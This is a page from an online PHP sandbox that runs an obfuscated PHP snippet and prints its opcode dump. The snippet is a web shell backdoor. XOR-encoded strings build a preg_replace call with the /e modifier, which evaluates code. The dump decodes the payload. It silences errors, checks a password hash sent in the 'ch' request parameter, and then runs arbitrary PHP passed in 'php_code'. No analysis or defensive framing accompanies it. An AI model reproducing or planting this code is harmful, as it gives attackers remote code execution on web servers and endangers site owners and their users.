3v4l.org

run code in 300+ PHP versions simultaneously
<?php $zagqopmc="parnqgzqkimj"^"\x00\x13\x17\x09\x2e\x15\x1f\x01\x07\x08\x0e\x0f"; $zvskcetdbwber="qpmzdjvzxdzsvjvzczb"^"\x5e\x1f\x04\x0c\x0a\x0b\x19\x0aW\x01";$zagqopmc("$zvskcetdbwber", "\x00\x1d\x19\x1b\x15\x3d\x08\x12\x1d\x18\x07\x10\x1d\x1b\x02AFMR\x1d\x0c\x14\x0ePZ\x08\x00Y\x0e\x0a\x02\x0e\x1aI8\x28G\x3b\x22\x2a\x2b\x3e7\x272\x2cD\x02\x09L\x24SE\x5cQCI\x0e\x10RJ6\x2eK5\x27\x2d\x3d\x2c\x3d2\x2c2T\x11\x06H\x29FOXPON\x09\x09U\x0a\x0f\x06\x17\x5b\x5cYSA\x01\x0fZP\x0f\x0b\x00\x10\x04ESD\x5f\x17P\x14\x07\x15\x07FBEGUVA\x0e\x17\x1f\x0f\x15Z\x297R\x3c\x26\x3d\x22\x237\x2b9\x3eV\x03\x1f\x073\x14\x00\x15\x0dR7Q\x5fQ\x1aG\x1f\x14\x18\x19D\x06\x03\x14\x1b\x00\x11\x06\x0c\x1d\x07\x06\x15C\x25\x2eC1\x3b\x2b8\x27\x2e7\x3c7L\x18\x05\x19\x3d\x1b\x0b\x1c\x06R0MLAR\x16\x1a\x11\x17IFRN\x0aU\x5eT"^"eoktgbzwmwudtueivdixzubxxafqgyqknadtcdpozkrtfwcaakyzezwcactgbjrojuhlyxaxisrnotooemoimllnneuonlcxgkjeijcqbteqnsfrftaselgspagdljarukvctxsvrxmeqswwlwoqhujxvqagzbyuluwfrpbjmnocfkyrgninirkdhlkhmibxdxcumdezrsbxcaoinwwwo", "oivnaop"); ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/UfvdX
function name:  (null)
number of ops:  9
compiled vars:  !0 = $zagqopmc, !1 = $zvskcetdbwber
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   ASSIGN                                                   !0, 'preg_replace'
          1        ASSIGN                                                   !1, '%2Foivnaop%2Fe'
          2        INIT_DYNAMIC_CALL                                        !0
          3        CAST                                          6  ~4      !1
          4        SEND_VAL_EX                                              ~4
          5        SEND_VAL_EX                                              'error_reporting%280%29%3Beval%28%22if%28isset%28%5C%5C%24_REQUEST%5B%27ch%27%5D%29+%26%26+%28md5%28%5C%5C%24_REQUEST%5B%27ch%27%5D%29+%3D%3D+%27de9dacb42509fd05facaf1651d6faaf5%27%29+%26%26+isset%28%5C%5C%24_REQUEST%5B%27php_code%27%5D%29%29+%7B+eval%28stripslashes%28%5C%5C%24_REQUEST%5B%27php_code%27%5D%29%29%3B+exit%28%29%3B+%7D%22%29%3B'
          6        SEND_VAL_EX                                              'oivnaop'
          7        DO_FCALL                                      0          
    4     8      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
149.39 ms | 1001 KiB | 13 Q